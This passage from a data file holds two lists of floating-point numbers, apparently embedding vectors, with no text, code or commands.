0.014952211,-0.0058449917,0.0069057,0.018617488,-0.025303947,0.0112684565,0.03880831,-0.0034658972,0.0022839706,-0.0057641147,-0.023945179,-0.017339934,0.004501484,-0.003622957,0.021259582,-0.0056775534,-0.0017737029,0.009410388,0.0031508666,-0.001059928,-0.02183732,0.016654303,-0.016630279,-0.014725012,0.013794534,0.020181956,-0.0070976983,0.010194598,-0.025159352,0.011162251,0.013072854,0.000040049254,0.009747625,0.047012266,0.005438204,0.01136931,-0.011920501,0.016600342,0.0009713195,-0.014584015,-0.014261729,0.016825063,-0.0054349955,0.0019518702,0.000107380736,-0.025113499,-0.00929595,-0.03638429,-0.011747707,0.0037146441,0.0007991437,0.00725801,0.021306464,0.0075065456,0.014280358,-0.0032827556,0.014630375,0.0034148968,0.000898714,-0.029329218,0.016294505,-0.04877016,-0.0024392954,0.009373484,0.006080139,-0.0297945,-0.023438694,0.015644679,0.004519285,-0.02731481,-0.011947558,0.021463336,0.0086774565,-0.01571086,0.0033973237,-0.01745385,0.0051226155,-0.019304205,0.00094843336,-0.0017022598,0.0072035296,0.0188564,-0.03590951,0.017270144,0.019305523,-0.012164805,0.007641964,0.0169359,-0.006288649,0.022858642,0.04022648,-0.00944305,-0.026133345,-0.034939956,-0.005779369,-0.005704167,0.008485682,-0.004218806,0.012281859,-0.026965156,-0.031992804,-0.028951367,0.005082885,0.000006622424,-0.026346898,0.0069507393,0.03134143,0.012017823,-0.007859312,-0.003735401,-0.022780415,-0.028281653,0.03604772,-0.008137923,0.0090855025,-0.009356516,0.027687928,-0.0027352818,0.02435936,0.019574437,0.0023973333,0.012473247,0.023358747,0.012485272,-0.0027309195,0.006848166,0.0072959135,0.013079443,0.013111141,-0.053137872,0.0059200376,-0.013517515,-0.011598848,0.033502456,0.0042259134,-0.029345827,-0.010376492,0.007893124,0.00058302126,-0.014955487,0.006968551,-0.035263747,0.0065045524,0.0052730697,-0.0043345164,0.030858448,-0.015780415,-0.011294999,-0.010825574,0.020347517,-0.0028583072,-0.0053580767,0.01955704,-0.0033127787,0.018113216,0.012435973,-0.028150387,0.023982454,0.0009880041,-0.005071291,-0.006884429,-0.00201534,-0.015104921,-0.018853717,0.03711123,-0.020985954,-0.01998361,0.019769782,0.038527295,0.0089018205,-0.031009166,-0.01927717,-0.00922311,0.0052669942,-0.019549862,-0.009370217,-0.007200483,-0.03478116,-0.0036309762,0.012375311,0.005621051,-0.027749209,0.0040591145,0.0069810646,-0.008785762,-0.02387125,-0.019485164,-0.022013623,0.006651156,0.004261028,-0.01765039,-0.00018706308,-0.0020469504,-0.029966036,-0.019937707,-0.014410813,0.039461624,0.015885985,0.015792958,0.01793276,-0.036200345,-0.028010963,0.03387763,-0.047920052,-0.01700884,0.011269985,0.014717115,-0.019455587,0.0008461757,0.0064821076,-0.025629826,0.007861957,-0.0056049167,-0.0051823314,-0.009922411,0.003181005,0.0246909,0.010977599,0.0019500528,-0.0226994,-0.001366167,-0.022133501,-0.016305272,-0.00031856063,0.016226992,0.0077832416,-0.0073743644,-0.011374052,-0.025386998,0.023602737,-0.0041455445,0.017223772,-0.0017128738,0.027840216,0.0018452007,0.017909542,-0.004313284,-0.0028698996,0.0101375915,-0.010021849,-0.005168741,-0.036328536,-0.0025823226,0.036021464,-0.0008936032,-0.012863123,-0.005081434,-0.02881572,-0.01286809,0.01245861,0.015239785,-0.0065734074,-0.01875791,-0.025511267,0.0028825183,-0.022637893,0.0037484318,0.0028616334,-0.020221038,0.014699573,-0.040521957,0.006296922,0.016086198,-0.00653971,0.003244347,0.008889604,0.012354479,0.009262478,0.028228242,-0.0081339395,-0.0068950267,0.030229647,-0.015712647,-0.014166153,0.005000065,-0.003952325,0.0068436936,-0.012907505,-0.015194603,0.005047353,-0.027951567,-0.00002149033,0.01826878,0.011024377,0.003384866,-0.007147171,-0.01676557,0.00283091,-0.009405306,0.014479637,0.014121111,0.015174837,0.0031138917,-0.0062371027,-0.0043765423,-0.036138646,-0.017380623,-0.0042012334,-0.011504801,0.021915944,0.0010572909,-0.016471589,0.0205661,-0.015984636,0.0055922526,-0.0004048264,0.00081947295,-0.05406468,-0.01654506,0.029241957,0.011865477,-0.015637016,0.023127085,0.00097267726,-0.008724437,0.019875776,0.003706599,0.015310847,-0.03638991,-0.0063458364,-0.050077118,-0.0017333777,0.02754121,0.014382059,-0.006506496,-0.0069930097,-0.00450532,0.05152151,-0.0019978525,0.02591444,-0.00029827445,0.038136132,-0.018098265,-0.016558222,0.002622802,0.009566783,0.03064361,-0.012721994,-0.024433443,0.032803595,0.0074463366,0.011248257,0.013982941,0.009452798,0.007974765,-0.017963352,0.02698208,0.0007505952,-0.005549819,0.015682407,-0.0017649145,-0.042956907,-0.037705716,0.018373111,-0.00791751,0.0061799176,-0.014437993,-0.015201368,-0.005653496,0.019543512,0.009322923,0.020512706,-0.0120520415,0.014042094,0.03574517,-0.015408415,-0.03769239,-0.009304932,-0.029101845,-0.0033921276,0.0034040087,-0.01168736,-0.0050001,-0.020074785,-0.009399394,-0.0026311777,-0.0013847887,-0.041666348,-0.0045369407,0.0013267989,0.005426833,0.01876267,0.02240836,-0.030726958,-0.00057512766,-0.0072468887,0.026476452,-0.016726095,0.010516517,-0.016017532,-0.0008597522,-0.035368253,0.030818896,-0.0076424084,-0.00032982635,0.04334088,0.0008672915,-0.007954789,0.021709492,-0.013665365,-0.0039933617,0.029777434,0.007153167,0.028705442,-0.015483926,-0.0043282616,-0.013354527,-0.010081493,0.030166194,0.0152667845,0.033148713,-0.020916002,-0.009033507,-0.023559047,0.011620293,-0.015643673,0.0038414071,-0.02030941,-0.010665987,-0.0012242076,0.0043254592,-0.039373867,-0.00915271,-0.0053044097,0.012991601,-0.0035544615,-0.0091690095,0.008938158,0.038335208,-0.045794845,0.0037336685,-0.015678473,-0.018454565,0.0022975933,0.0005331297,0.017492158,0.014607946,-0.030571438,0.010037095,-0.02924748,0.023478609,-0.0024368993,-0.039259866,0.010051338,-0.0043341224,0.027024176,0.024648497,-0.031440314,-0.017725801,0.0038605256,-0.0008456187,0.0399183,0.028055103,-0.010316601,0.016702913,0.012455313,0.018579317,-0.022415685,-0.009518299,-0.025671137,0.07310702,-0.024094248,-0.0135196885,-0.009337099,-0.028852597,-0.0004291006,0.007762804,0.0026944352,-0.006446149,0.027468456,0.03203444,-0.05284426,-0.0050974917,0.014981391,0.014315652,0.031632233,0.0035217693,-0.0022989681,-0.022542173,-0.033500392,0.04596646,0.009165693,0.006471111,0.024137849,0.009167927,-0.035868656,0.018378068,0.014241647,0.002652692,0.04537513,0.0035812506,-0.026155641,-0.008977607,0.015627954,-0.0026571536,-0.004759817,0.008173559,0.006565586,0.01250191,0.002732685,-0.020868056,-0.019543886,0.023671372,-0.012292917,-0.012938668,0.025229547,0.017080776,-0.009651745,-0.007620624,-0.005411025,-0.0055328957,0.017909188,-0.012402618,0.018528031,-0.019871613,0.006786299,-0.009171196,-0.0076395576,0.0026297292,-0.004657521,-0.0061175865,-0.0129901515,-0.019456564,0.014795287,-0.01995527,0.0044490006,0.0007809022,-0.0021794753,-0.0012136383,-0.044176806,-0.007134764,-0.012381435,0.0052517136,0.020000966,0.011657411,0.019262912,-0.018575344,0.024343016,-0.031745784,-0.0097244,0.0027000643,0.014169457,0.0033121791,0.006434338,0.007022098,-0.0008408021,0.021863637,0.0051611965,-0.009992294,0.02464445,0.0019083748,0.010511306,0.0002888198,0.031296816,-0.004306139,0.024366595,0.019003138,0.0044974415,0.000053764954,0.0034718136,0.014142663,-0.02970609,0.034022283,0.019835485,0.013585204,-0.029567635,0.012739681,0.020089792,-0.0013195619,-0.027269784,-0.00076451787,0.010074675,0.010402682,0.016422242,-0.0048854793,0.009138041,-0.056494385,-0.024319923,0.0010499188,0.0027185353,0.00786398,0.0128073115,0.020334434,-0.013640155,-0.038817637,0.005716908,0.03665446,-0.013249019,-0.0031615251,-0.010609743,0.030031716,-0.03671518,-0.026506854,0.02365278,-0.0055045323,0.034173332,0.023119045,0.0053881546,-0.0059484374,0.0015696783,0.057230096,-0.0004056462,0.0063035577,0.0145024285,0.011716439,0.00066185906,0.010667088,0.018359093,-0.0007242882,-0.000033628854,0.011355009,-0.0021324446,0.0003503894,0.010061589,0.0036040014,-0.0026541227,-0.021037608,0.009177145,0.01519088,0.009295769,-0.016618853,-0.006875536,0.022153279,-0.014955138,0.013442542,0.035443366,-0.00035700263,-0.021694884,0.032707404,-0.0038134637,0.0042447187,-0.0097017065,0.019978307,0.018345356,0.015279175,-0.009108722,-0.00936517,-0.0008742131,-0.021250403,-0.0071267304,-0.0062728636,-0.015434686,0.0062617054,0.0086493315,0.013696925,0.009286789,0.009887919,0.0020349813,-0.0061916197,-0.008228359,0.01883521,-0.005776779,0.011289582,-0.0009200009,0.0030389442,0.030042743,-0.012378721,-0.00009986324,-0.016465886,-0.01734528,-0.00477543,0.010986183,0.0022291811,-0.027977832,0.010085023,-0.0040799775,0.0036154874,-0.0036912675,-0.029640602,-0.011614091,0.020371197,-0.022769941,-0.016165154,-0.005877076,0.027248157,-0.02602176,-0.032046825,-0.017780734,-0.033100102,0.0024253465,0.0018803305,0.0023364783,-0.0012999271,0.0019714728,0.014282352,0.0044855154,0.021984736,0.005861293,-0.00037108664,-0.02392028,-0.017353186,-0.028902415,-0.010667181,0.0004095319,-0.02731951,0.0149479555,-0.0007463084,-0.0017374224,-0.0068541295,0.010237253,-0.0077595552,0.014182566,-0.010633312,-0.014463292,-0.0143112205,0.0010553225,0.0057171336,-0.031728897,-0.0002508962,-0.04141271,-0.0057643387,0.006150502,0.008430856,-0.0057690707,-0.00028427,-0.00025389335,0.014121715,0.0015712808,0.009410613,-0.016039923,-0.0049590436,-0.0019732905,-0.019071488,-0.0030742933,-0.023673087,0.023754742,-0.01989016,0.013296116,-0.0052247834,-0.0032753681,0.0029785405,0.012370226,-0.0070351,0.010939175,-0.014030851,0.010841469,0.0055356347,-0.002623338,-0.0056525017,-0.0047510164,0.013530583,-0.018250812,0.02692795,0.010490702,0.025814475,0.0018144702,-0.031291787,0.020042017,0.01588422,-0.04116611,-0.022405645,0.0066453936,0.0032790748,-0.005903112,0.011674646,0.006882992,-0.026929582,-0.029850284,0.001993349,-0.006447715,0.0121420985,-0.010792129,-0.001136789,0.002216637,-0.006736384,-0.017859405,0.0028485763,-0.00028617153,-0.024668554,-0.0125183035,-0.011442871,0.0010499522,-0.028847877,0.017305512,-0.011618005,-0.017935075,0.011555801,0.007904521,0.012870597,0.028182454,0.032769904,-0.014100391,-0.008013859,-0.0033565552,0.017422903,-0.008704298,0.021480987,-0.028234689,-0.042816322,-0.004392496,-0.0060100593,-0.004192251,0.026131015,0.0024144691,0.013362079,0.023448003,-0.01210549,0.05709406,0.0069312872,-0.0033494248,0.009603711,0.015640391,-0.03843731,0.0031211576,0.01002216,-0.017656127,-0.008454154,0.009156863,0.034070645,0.0007698297,0.030574434,-0.024694609,0.012734147,0.018386304,0.08854837,0.007853729,0.0015200808,-0.013398462,0.02829923,-0.0036680435,0.011278286,0.010049572,-0.088459544,0.009559018,-0.020112509,0.010445769,0.0064165727,-0.035714038,-0.0008442518,-0.0052897283,0.02332123,-0.045371193,0.018743442,0.013458783,0.0124769155,-0.017153552,-0.011068646,0.007495918,-0.014710252,0.008934604,-0.00014783445,0.001297891,0.027908301,-0.015442075,-0.0017282966,0.0070226737,0.0040289974,0.026666915,0.009940525,0.001966201,-0.0109401,0.0015099586,0.008341923,-0.012082542,0.00782984,-0.014775534,-0.031224363,-0.028110178,-0.015027937,-0.011095191,0.02923958,0.001970591,-0.0022189447,0.022089966,-0.030903589,-0.0372735,0.03697583,0.013989826,-0.0044870065,-0.00023495346,-0.0002722037,0.00773441,-0.025186062,-0.028636513,0.0023222773,0.017336493,-0.019220794,0.025472224,-0.010058312,0.01051017,-0.01698823,0.009611534,0.030769993,0.0005135317,-0.007876507,0.030148312,-0.013825731,0.011786596,-0.01383306,-0.018511074,-0.005297095,0.0032783232,0.00016520925,-6.025965e-8,0.012034711,0.002001543,-0.032706685,0.009170343,0.012723449,-0.0047365744,0.018739076,-0.0018912273,0.007989076,-0.02676244,-0.03455003,0.021262644,0.0041796956,0.029460296,-0.0019275893,-0.023192167,0.022808554,0.0014532608,-0.004827072,-0.029082494,-0.031214004,-0.019917388,0.012333379,0.002889292,-0.00061849377,0.0037921513,0.003963741,-0.0019878265,-0.027269203,0.01436466,0.0013561292,-0.008383233,0.020234054,0.007256575,0.0034417787,0.0012068755,0.021003567,0.027602253,-0.0021440503,-0.0068185814,-0.04044928,-0.012780764,0.00420862,-0.0044605983,0.020256717,-0.00008472208,-0.00038654503,-0.010535526,-0.02636336,-0.006788957,-0.017311389],[0.013829305,-0.00484548,0.013276419,-0.01694291,-0.0062774024,-0.010476044,0.0006852581,0.011765926,0.021695524,-0.008757985,-0.009130606,0.013631156,0.013917512,0.012124829,0.001096162,0.0143377455,0.00016079332,-0.0013303892,0.014012318,-0.0207015,0.0034962716,-0.005852047,0.0053615477,-0.013656049,0.0109433485,0.015827265,-0.0013824658,-0.032684255,-0.012098167,-0.026202183,0.004057071,0.013833952,-0.013478561,-0.00938052,0.026416639,0.0089470595,-0.014456335,0.006204599,-0.00087035645,-0.03619834,0.023220409,0.00461428,-0.0025514625,0.021920322,-0.00115008,-0.024017863,0.0010511229,-0.012009917,-0.015671827,-0.010438981,0.0121804625,0.00902588,0.016297897,0.00025695135,-0.0027199646,0.014977126,-0.010409944,-0.018757064,0.0034087352,-0.023252336,-0.007234839,0.0020391892,-0.030696208,-0.011912836,0.017971894,-0.015469259,-0.013363662,0.011606036,-0.0037537517,-0.009580031,0.021212908,-0.013102236,0.006571888,-0.0002133813,-0.004656091,-0.0009464772,-0.0065050106,-0.01613138,-0.011244693,-0.0043009776,-0.025878914,0.007508739,-0.00060641195,-0.008881116,-0.0037808714,-0.0019663635,-0.021911504,-0.006861658,0.013450832,-0.003919588,-0.019419363,0.011911817,-0.01128585,0.022645462,-0.010409874,0.032433588,0.0053639966,0.004586279,-0.019865597,0.0026504223,-0.027030282,0.00028544423,-0.035086673,0.010893736,0.0051504583,-0.0051309983,-0.0054881847,-0.0058566635,0.0013289863,-0.0035939768,0.0040268875,-0.002324032,0.0040847366,-0.018581698,0.011793601,0.0060652136,-0.011877845,0.014029846,-0.013136505,0.0030384865,0.008986103,0.0032759479,0.019464446,0.012845445,-0.0067028315,0.0041270345,-0.018490372,-0.008622568,0.009471281,-0.017583104,-0.0040874914,-0.009844447,-0.016603373,0.009654203,-0.009056751,0.0005533538,0.00018220213,-0.0013770344,0.0011209835,-0.027235955,0.009086007,0.016736109,0.0053640935,0.0074624578,-0.015467145,0.012843434,0.025464717,0.03260286,0.019464884,0.0084614465,-0.012493116,0.0006548421,0.0062070205,-0.0243985,-0.000024897197,0.014467237,-0.030112907,0.00025884542,-0.015551347,0.022016821,0.012460978,0.0021316428,-0.0060737366,0.02456737,-0.0018699347,0.017380813,0.0046240427,-0.0135430405,-0.009322939,-0.0013190508,-0.006301555,-0.010713819,0.006091658,-0.035114825,-0.00092811754,-0.0016850365,0.012000128,-0.0019821709,-0.016042596,0.028670397,-0.017008623,0.031207006,0.00788904,-0.0016843493,0.009688631,0.010788552,0.0016136919,-0.0068995156,0.0032524122,0.00402949,0.0103974445,-0.005663644,-0.030873576,0.010998185,-0.013144378,-0.0125358915,-0.0066205566,0.115015164,-0.017962884,-0.01062578,-0.004864749,-0.020866526,0.0075473655,-0.01902021,-0.0019511887,-0.0011652074,-0.047318358,0.032142267,-0.009334941,-0.013202654,0.0036429614,0.0015464306,0.01316644,0.0068424884,0.016114777,-0.049630113,0.0049246973,0.019592704,-0.011549939,0.014039419,0.016116256,0.0022983553,0.0036280109,-0.002139862,-0.020248832,-0.008930578,0.015926972,-0.013048577,-0.000094792034,-0.015558088,0.023703663,0.010246875,-0.01984235,-0.0052614636,-0.0047507193,-0.028448304,-0.0025400822,0.005640959,0.013906499,-0.01542386,-0.025129214,0.0022949812,0.026851708,0.016475841,-0.0047239535,-0.0005043907,0.012770476,-0.0020959035,0.012341399,-0.000044836113,-0.0086536575,-0.011017658,-0.0057986346,0.017046522,0.007818763,-0.017193291,0.0075267283,0.0054345983,0.02380029,-0.0006746932,0.009912997,0.023258142,-0.014236865,0.014751599,0.007768814,0.013249469,0.016788043,-0.030739676,-0.016805837,-0.007892587,-0.0060748523,0.00841995,0.0021826797,-0.0054163737,0.032007165,0.0066376114,0.001303931,0.0039486727,0.010531168,-0.0022418513,-0.005909066,-0.003217969,-0.0124333305,0.007920001,-0.041498866,-0.0018121595,0.012677041,0.009177554,0.012627687,-0.019469893,0.00057616434,0.012751502,0.032533024,-0.006792102,-0.006055654,-0.0013563895,-0.0027777243,0.02652159,0.022452151,-0.001241636,0.0028856378,-0.019484708,0.0341825,-0.0049535125,-0.004103284,0.0013575726,0.0066046626,-0.012454411,0.0070499433,0.005245259,-0.014499427,-0.024190098,0.016244875,0.0048888735,-0.0035064716,0.029480774,-0.0017650061,-0.01698681,0.013783934,-0.007945571,0.008873297,0.012831043,-0.010204003,-0.011463746,-0.01132822,-0.017977618,0.023035856,0.0020787907,0.0063992464,0.046076976,-0.0038475504,0.0062281177,-0.009332707,0.009916193,-0.038076267,-0.0024126084,0.008559671,-0.0014181755,-0.002995773,0.030346991,0.0017434951,-0.0016975187,-0.033883102,0.009219108,-0.023682535,0.022305312,-0.00647379,-0.004859245,0.007189461,0.0054219775,-0.0069322363,0.01286554,-0.0067266445,0.03204539,-0.008809267,0.0075055077,-0.016470253,-0.005782539,-0.019499952,-0.0041780155,0.0124244755,-0.0035765949,-0.00835971,0.004565964,0.075542,0.010518942,-0.002895409,0.0038986073,-0.0017654651,-0.017165106,0.022689272,0.017915776,0.0055764485,-0.0067521217,-0.037738778,-0.015184646,0.0064821537,0.0137874745,0.0061322204,0.00027363433,-0.03484659,0.00037119933,-0.02591781,-0.011167254,0.039468043,-0.005671772,-0.03110698,0.005583238,0.024875196,-0.016705934,0.012741111,-0.0029317038,-0.0049976474,-0.010141292,0.013212512,-0.008189062,-0.0027835262,-0.009809049,-0.0063059744,0.021148292,-0.0034031866,-0.007867402,-0.0034985612,0.0052027297,-0.009926659,-0.014373553,0.01885899,-0.0031048234,-0.019408766,0.014768269,0.024873817,0.019196188,0.011002567,0.012880392,-0.000117806776,0.028876334,-0.012117041,0.020324191,-0.009971408,0.004070909,0.011274092,-0.025595458,0.0036337124,0.01891209,0.019124929,0.0140039595,-0.020343848,0.0059550684,-0.010937936,0.033962864,0.0052523403,-0.0034874317,-0.028814454,-0.017561784,0.008588881,0.019291826,-0.008677438,0.027602462,-0.01523939,-0.0016640327,0.0007260522,-0.00550809,-0.018663945,0.0143151665,0.003733792,0.01751032,0.0022303942,0.0049967817,-0.018645743,-0.028906846,-0.0057236324,0.031890154,0.0044120844,-0.014927726,0.028609702,0.021634875,0.031830147,-0.025799988,0.013917981,-0.018928055,0.005421213,0.008551025,-0.0008576748,0.026309589,0.0011759679,-0.008553492,-0.021379637,-0.013561492,0.015609781,-0.021474585,-0.015285107,-0.032913987,0.007783832,0.02006897,-0.00043004344,-0.0008716781,-0.02204176,0.011671674,0.0048763305,-0.0073080747,-0.020585272,0.011366411,0.009076612,0.0021531705,0.009340973,0.00036168535,-0.0045584026,0.026517255,-0.024163382,0.017968448,0.00321016,-0.009451029,0.014345488,0.011339603,0.013570506,0.031633005,-0.0075197257,-0.04769026,-0.012492839,0.012788915,-0.006952974,-0.003223058,0.050197996,0.036252946,0.0048244335,-0.00048697536,0.008278291,0.013883287,0.0032436552,0.008447292,0.017892765,-0.006171142,0.009099106,-0.012465441,0.003483102,-0.00010028664,0.0042728474,-0.010041657,-0.007914348,-0.010094183,0.0037696816,-0.02124135,-0.019009478,0.002178422,0.040510546,-0.025302576,-0.011101029,0.00926362,-0.0039956477,0.023657717,-0.0074843857,0.06483001,0.0069903773,-0.021219715,0.0034199583,0.0034091044,-0.013435355,0.0076731564,-0.010385271,-0.016014924,0.0099776825,0.019620085,-0.00414762,0.0007654728,0.008716263,-0.03288983,-0.0013587582,0.0066480767,-0.003096712,-0.005686771,-0.0074323993,0.012514889,-0.009915249,-0.019782877,-0.035985727,-0.031016484,-0.0068833437,0.043786246,0.0071828887,0.015706081,-0.0050489656,-0.02328936,-0.029995149,0.0010931425,-0.012940532,0.012839621,-0.020058867,-0.0010687165,-0.003906152,0.009286652,0.002103954,0.014606297,0.004899507,0.02445144,0.023362296,0.009555945,-0.004444516,-0.03175143,0.00910763,0.0017872282,-0.008092523,-0.04157272,0.018478937,-0.014632363,0.00072224764,0.0015069152,-0.006427492,-0.0006191082,0.011602635,0.0021692114,0.0068951934,0.01763404,0.0020287596,-0.009528578,-0.03747051,-0.011080977,-0.010449551,-0.00083509384,-0.006588407,-0.017473407,-0.038252037,0.0058158296,0.004091143,0.029575957,-0.00082187325,0.01264628,0.018947067,0.0011015506,0.012978434,0.013797248,-0.008608659,-0.007734086,0.016669406,0.0079959165,-0.014608823,-0.019649444,0.018713022,-0.0059622084,0.027348101,-0.03145767,-0.0141833415,0.022398755,0.0028635622,-0.0036437975,0.004057485,0.020410853,0.012214002,-0.010713967,-0.02296878,-0.0010719371,0.0026256742,0.0042985897,-0.026870314,-0.009525958,0.02291539,-0.0035537332,0.016477894,0.015484807,0.008899346,0.01455668,-0.01134491,0.0013419403,-0.061326217,-0.0035453595,0.0106785875,0.006012865,-0.016034592,0.04279082,-0.018535824,0.015134928,0.004318383,0.00539043,0.013126636,-0.018212695,-0.0052694553,0.036174633,0.02903975,0.009754468,-0.006349663,-0.0021770336,0.010675459,-0.03378346,0.01941114,0.032439195,0.0074967644,0.0066607133,-0.00048603772,0.0055055968,-0.023061188,-0.0077706026,0.008498701,0.0020653647,0.021376085,0.006620914,0.009397665,0.0074996883,-0.0041365335,-0.0031415427,-0.004756585,0.014942555,-0.025835901,-0.009396477,0.0057360847,-0.032651294,-0.01646538,-0.019093357,-0.005092776,0.023510989,-0.016170727,0.00762906,0.008705172,0.032737523,0.0024746372,-0.005236687,0.015891926,0.012486066,-0.017964134,-0.010347969,-0.00887725,0.023904074,-0.01573706,-0.010867202,0.028193532,0.0081592435,0.004473337,-0.021850491,-0.0011538063,0.031334694,0.039733075,0.0012890522,-0.0024303298,0.008259284,-0.0025005527,0.008266118,0.012946227,-0.0109742135,0.031487267,0.016316049,0.01587744,-0.005373308,-0.0020447255,-0.014443771,0.017187575,-0.037868805,-0.009744122,0.016952496,-0.00476184,0.010021845,0.00078415155,-0.0059190462,-0.007653325,0.0031759108,-0.03672981,-0.0038350304,-0.017151158,0.013946702,0.0022108597,-0.003655041,-0.0034689868,-0.025441049,-0.029135665,0.0026603558,0.009393524,0.0075681033,0.014699025,-0.023248475,-0.018456198,-0.00894598,-0.008243697,-0.009900961,-0.01770154,0.026064523,-0.013167071,0.013614677,0.013024448,0.005794277,0.026312258,0.020140748,-0.015490823,-0.0014180265,-0.01341064,-0.0054261517,0.007163508,0.01787859,0.007728274,-0.010940084,0.019225841,0.015520279,-0.01067377,-0.015364991,0.013130212,0.011795307,0.01933117,-0.013489779,0.0021417423,0.009834947,-0.018113058,-0.025052,0.020724079,0.0024360328,-0.0065225395,-0.028184162,-0.014080173,-0.021431006,0.013878368,-0.009624747,0.029957809,0.005424481,-0.005178723,0.006953328,-0.019225104,-0.00006226558,0.023470359,0.026125025,-0.00528589,0.006381355,-0.018300978,0.0067664105,-0.024674423,-0.0052124565,-0.0032901738,-0.018604038,-0.013338481,0.026531445,0.009041976,-0.027836598,0.0077244295,0.008352718,-0.021704964,0.012538134,-0.013947312,0.0066234027,0.0064749,0.021388734,-0.012029146,-0.0044243024,0.0015268065,0.002639194,-0.020771345,0.022548623,-0.005933315,-0.016585477,0.02650024,-0.018858982,-0.010007238,0.0058608344,-0.0071180803,0.0046175513,0.004067944,0.00851889,0.01596035,-0.014876884,-0.032900434,0.01452272,0.0031332918,-0.021813825,-0.0005908156,0.014963368,-0.0066638137,0.006231944,-0.014054615,0.00004473688,0.047042675,0.003958207,-0.045465942,0.01511829,-0.016791832,-0.002784288,-0.00689653,-0.0011254989,-0.018527536,0.016082838,0.018562656,-0.021952795,0.015655931,-0.00066909153,0.020167,0.010725181,-0.016254995,-0.0049580853,-0.021634722,0.0034131436,-0.014456486,-0.022884391,-0.02647456,0.0032786052,0.0021345345,-0.014719521,-0.009715621,0.036362376,0.012354081,0.02457988,-0.015003939,0.001635506,-0.006812766,-0.022199351,0.01299939,-0.0057277908,-0.021921623,-0.00443207,-0.0031199777,0.018265726,0.009641016,0.009061614,-0.016731994,-0.024430688,0.0323154,-0.023087088,0.027403098,-0.0026101884,-0.018500885,0.0037593464,0.0069092023,-0.025953712,0.01478129,-0.017484007,0.011474526,0.010945137,-0.0010028947,0.002523144,0.005444992,-0.028904762,0.021039555,0.018971538,0.017113501,-0.0056998795,0.016040444,-0.0022625362,0.0046050446,-0.018512892,-0.007832016,0.022072263,-0.0034976494,0.03270145,0.009429998,0.034631427,-0.022436742,-0.0078032175,-0.00021096291,-0.009061289,0.019868018,-0.010445644,0.005905034,0.017449996,0.0064184438,-0.01734402,0.0058837812,-0.029349567,0.009336994,0.00386053,-0.008266839,-0.0017444424,-0.007395476,0.03185443,0.011929753,-0.016196167,0.0040239934,-0.011266799,-0.016347837,0.011142693,-0.00049072807,-0.0050036763,-0.00934954,0.012708092,-0.0021571917,0.0064454502,0.019715827,-0.0062439614,0.00949486,-0.009267526,-0.010509184,-0.014290542,0.021561177,-0.005635383,-0.025655383,0.03530959,0.0148169305,0.012210872,-0.01717162,0.0013425921,0.0062370915,-0.0033380573,0.008626158,-0.01060649,0.0156182395,0.0025760185,-0.022177134,0.011641764,0.020935206,0.008239862,-0.0063883914,0.011260803,-0.008168696,-0.018315399,0.022657499,-0.004364571,-0.0226677,-0.0154193295,0.0092579825,0.015410036,-0.019184725,0.026319835,-0.011777986,0.0073610777,-0.0032253815,-0.004046786,-0.006593117,0.003805153,0.03032463,-0.016611068,0.010787371,0.03668242,0.0116176205,0.029531572,0.0010026896,0.011621994,0.0027771587,-0.008352747,0.0017410676,0.0039067445,0.013223789,0.0060603986,-0.026844364,-0.0014993756,-0.002109995,0.002721444,0.0016696424,0.009657498,0.0033042203,-0.011086774,0.005986558,0.0027926564,-0.0043032463,0.014500288,0.005902387,-0.0062430943,-0.00032405776,-0.0022076988,-0.0078650685,-0.009093305,-0.004738654,0.0067924014,-0.044331554,0.035165276,0.02186254,0.009523372,0.00246133,-0.0160818,0.006668451,0.013150002,-0.00036670495,0.015742509,-0.017926918,0.02102304,0.005686997,0.035377618,0.0128164645,0.0016012744,0.014095685,0.0012104185,-0.029296318,0.024635399,-0.01538343,0.0008321124,0.009478201,-0.0010425781,0.012038706,0.012193345,-0.0040127602,-0.0016941582,0.0021234367,-0.0142202815,0.017335068,0.003100833,0.0064396774,0.027771601,0.05728975,0.015897505,-0.009321117,-0.00637639,0.0065609477,-0.0091300225,-0.008808624,0.0035584026,0.028675348,0.025133349,0.010399577,0.0037742585,-0.009343431,0.018205443,-0.014828407,-0.0036740797,0.013488827,-0.01190283,-0.015027332,0.008718898,-0.009314735,-0.0016944489,-0.0039423155,-0.043695204,-0.03678093,-0.010055989,-0.015850632,-0.015468666,-0.017091554,0.020199267,0.008221573,0.014637072,-0.0057622567,-0.00660154,-0.0031450102,-0.047123358,-0.012358853,0.027560329,0.0053119734,-0.010243825,0.008827506,-0.0017275123,-0.015037822,-0.024268875,0.017769288,-0.019779298,-0.028975338,-0.021385273,-0.020899883,-0.00034438903,-0.025630305,-0.0069173635,-0.0012813454,-0.0090504335,-0.023080738,0.009680892,0.013366785,-0.0018903894,0.035836875,-0.0044375556,-0.020128766,0.00728935,0.0213063,0.03452282,0.01017843,0.032173514,0.025213843,-0.03820495,0.001534958,-0.006244897,-0.014461472,-0.012598151,-0.021570008,0.0072522536,-0.011704013,0.011715917,0.0039345045,-0.0074777235,0.017074445,0.0069372132,-0.00024356625,0.013247016,-0.016754258,0.024797477,0.0010495497,0.010840222,-0.0031997506,0.0022717847,0.010841237,-0.0035101958,0.001320618,-0.0045256657,0.004630194,-0.000752899,0.00223066,0.00887288,-0.013601184,0.0020999676,-0.014571167,0.020154303,0.024406865,-0.02286941,0.010484953,-0.0036079786,-0.0023403994,-0.008182164,0.016342822,-0.005779206,0.018787634,0.007722923,0.0070148064,0.0049243993,0.011421515,-0.02202688,0.041725334,-0.015584632,-0.011593778,0.009026214,0.009832283,-0.0029913443,0.0017611586,-0.01983029,-0.0028992395,-0.0056747273,-0.011262318,0.0013326341,0.022861088,0.044343337,0.006664239,-0.0054691294,0.0063030715,0.009378954,0.0022013392,-0.013519332,-0.010115409,-0.013915286,-0.000099298806,-0.0067966455,0.008580519,0.0019964848,-0.014031988,-0.00023567751,-0.01039237,-0.0047645,0.0039411765,0.015405881,0.0055963174,-0.015239441,0.022910066,0.0073149637,0.009005604,-0.0078287,-0.003538438,0.006116822,0.011527363,0.00627335,-0.0196301,0.009676209,-0.025109211,-0.02857042,0.031968903,0.010073443,-0.017252484,0.0067228638,0.005910518,-0.009763211,0.032520782,0.036860507,0.018035166,-0.03624006,0.011702411,-0.021929236,-0.002021644,-0.010414169,0.014522439,0.0071994425,-0.003448682,-0.01480969,0.008371904,0.018646145,0.021349361,0.00011795942,0.052530702,-0.0059212944,-0.01374816,-0.021803766,-0.0142502915,-0.018585864,0.011083897,0.013307007,-0.0046955803,0.011522503,-0.018586066,-0.00850039,0.007907466,-0.03236719,-0.01592138,0.005870875,0.001840542,0.011578585,0.010257947,0.012829631,0.0014019433,-0.017547265,-0.014343911,0.0074660145,-0.016207922,0.028262464,0.005654876,0